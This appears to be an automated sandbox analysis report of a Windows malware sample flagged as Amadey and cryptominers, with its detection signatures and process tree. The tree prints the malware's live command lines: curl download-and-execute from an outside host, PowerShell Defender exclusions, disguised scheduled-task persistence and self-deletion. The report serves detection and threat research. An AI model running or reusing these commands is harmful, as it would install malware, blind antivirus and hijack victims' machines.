
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520638
MD5: dc730eea0eba910485703a74d173f8e2
SHA1: 093f63548d7366b6c3cbfc3ddfca453199e40eca
SHA256: 18894a1a879e0e75c33ec7988c8835b20b42a3fae8c51f1cb4f026f2b855a6b7
Tags: exe, user-Bitsight

Detection

Amadey, BitCoin Miner, SilentXMRMiner
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected BitCoin Miner
Yara detected SilentXMRMiner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Found strings related to Crypto-Mining
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample is not signed and drops a device driver
Sigma detected: Curl Download And Execute Combination
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DC730EEA0EBA910485703A74D173F8E2)
    • axplong.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: DC730EEA0EBA910485703A74D173F8E2)
  • axplong.exe (PID: 7728 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: DC730EEA0EBA910485703A74D173F8E2)
  • axplong.exe (PID: 2304 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: DC730EEA0EBA910485703A74D173F8E2)
    • loader_5879465914.exe (PID: 1748 cmdline: "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" MD5: 7DF3608AE8EA69762C71DA1C05F0C043)
      • cmd.exe (PID: 4408 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 7276 cmdline: curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • cscript.exe (PID: 7692 cmdline: cscript conf.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
          • schtasks.exe (PID: 7580 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7952 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7832 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7900 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4632 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5744 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2228 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8180 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6428 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6988 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 888 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5752 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3104 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5812 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4812 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6616 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7096 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 6580 cmdline: curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • miner2.0.exe (PID: 5868 cmdline: miner2.0.exe MD5: 651396CF297F15A1F92EE0A29E27C4EA)
          • cmd.exe (PID: 8080 cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4496 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 7968 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 8116 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 3104 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 2756 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • svchost64.exe (PID: 5992 cmdline: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe" MD5: A8638A5105C9A663B0D6918D64B3AD21)
              • cmd.exe (PID: 7224 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 7232 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • services64.exe (PID: 6976 cmdline: "C:\Windows\system32\services64.exe" MD5: 651396CF297F15A1F92EE0A29E27C4EA)
                • cmd.exe (PID: 3900 cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 3736 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 280 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming' MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 2600 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 8016 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 6364 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • svchost64.exe (PID: 6772 cmdline: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: A8638A5105C9A663B0D6918D64B3AD21)
                    • cmd.exe (PID: 6940 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • schtasks.exe (PID: 6740 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                    • sihost64.exe (PID: 7008 cmdline: "C:\Windows\system32\Microsoft\Libs\sihost64.exe" MD5: 7112FD4E6B2CDD13C11B8B04A96769CB)
                    • cmd.exe (PID: 4476 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • choice.exe (PID: 7812 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
              • cmd.exe (PID: 4116 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • choice.exe (PID: 4280 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
      • cmd.exe (PID: 7604 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7728 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5904 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6620 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3732 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 796 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1908 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6592 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7804 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6032 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4940 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1436 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3284 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1464 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4112 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2696 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5728 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6352 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1640 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1368 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2436 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1716 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3636 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Microsoft-Edge.exe (PID: 7636 cmdline: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe MD5: 7DF3608AE8EA69762C71DA1C05F0C043)
    • cmd.exe (PID: 7772 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7880 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3872 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6064 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1984 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2504 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1988 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3760 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2696 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1740 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5676 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6184 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6568 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6288 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6700 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
